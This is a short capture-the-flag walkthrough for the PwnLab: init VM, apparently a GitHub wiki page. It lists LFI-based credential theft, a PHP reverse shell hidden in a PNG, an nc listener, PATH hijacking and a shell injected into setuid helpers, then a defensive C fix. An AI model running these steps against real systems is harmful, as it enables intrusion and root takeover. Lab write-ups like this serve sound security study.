pwnlab init writeup - PacketMonkey22/boot2roots GitHub Wiki


nmap -A -T4 -p- $ip

Ports 111, 48170, 51403, and 3306 (mysql)

dirb http://$ip

Tried sql injection and basic LFI

Tried LFI base64 bypass on upload page

Page refers to config page

LFI base64 on config page

Username and password for mysql

mysql -h $ip -u root -p

Show databases;

Use $database;

Select * from $table;

Base64 decode the pass fields to get the passwords

Login then upload reverse shell

download pwnlab png

modify reverse shell then cat png/php >> shells.png

upload shells.png (view image, name changed)

tamperdata

confirmed Lang LFI

nc -nlvp 8888

lang image, success

whoami/id -- www-data

tty shell

login users - mike fails

kane has msgmike file

cat line in file. It appears to be running the command

try running, nothing

strings msgmike - cat /home/mike/msg.txt

$PATH

export PATH=/home/kane:$PATH

echo "/bin/sh" > cat

chmod +x cat

./msgmike

whoami/id - mike

cd ../mike

ls -al - msg2root file

./msg2root - runs what I enter as echo

./msg2root again - enter word; /bin/sh

whoami/id - root

cd /root

ls

cat flag.txt
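
Both escalations above (msgmike picking up a fake cat from PATH, msg2root treating "; /bin/sh" as a second command) have the same fix on the defender's side: run a fixed absolute path with a fixed environment and pass input as one argument instead of shell text. This is an added example, not code from the VM or from these notes; it assumes the two binaries hand a command string to a shell (the notes only show the strings output and the behaviour), and run_no_shell / echo_message are hypothetical names.

```c
/* Added example: hardened pattern for msgmike/msg2root-style helpers. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Run abs_path with a fixed environment and no shell; capture stdout in out.
 * Returns the child's exit status, or -1 on error or a non-absolute path. */
int run_no_shell(const char *abs_path, char *const argv[], char *out, size_t outsz)
{
    char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL }; /* caller's PATH dropped */
    int fds[2], status;
    size_t used = 0;
    ssize_t n;

    if (abs_path[0] != '/' || outsz == 0 || pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                          /* child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execve(abs_path, argv, clean_env);   /* no PATH search, no /bin/sh */
        _exit(127);
    }
    close(fds[1]);
    while (used < outsz - 1 && (n = read(fds[0], out + used, outsz - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* The message is passed as one argv element, so ';' is data, not a separator. */
int echo_message(const char *msg, char *out, size_t outsz)
{
    char *const argv[] = { "printf", "%s\n", (char *)msg, NULL };
    return run_no_shell("/usr/bin/printf", argv, out, outsz);
}

int main(void)
{
    char buf[128];
    setenv("PATH", "/home/kane", 1);         /* constructed: hostile PATH, as in the notes */
    int rc = echo_message("word; /bin/sh", buf, sizeof buf);
    printf("rc=%d output=%s", rc, buf);
    return rc;
}
```

With this pattern the PATH export has no effect on which binary runs, and the msg2root input comes back as literal text.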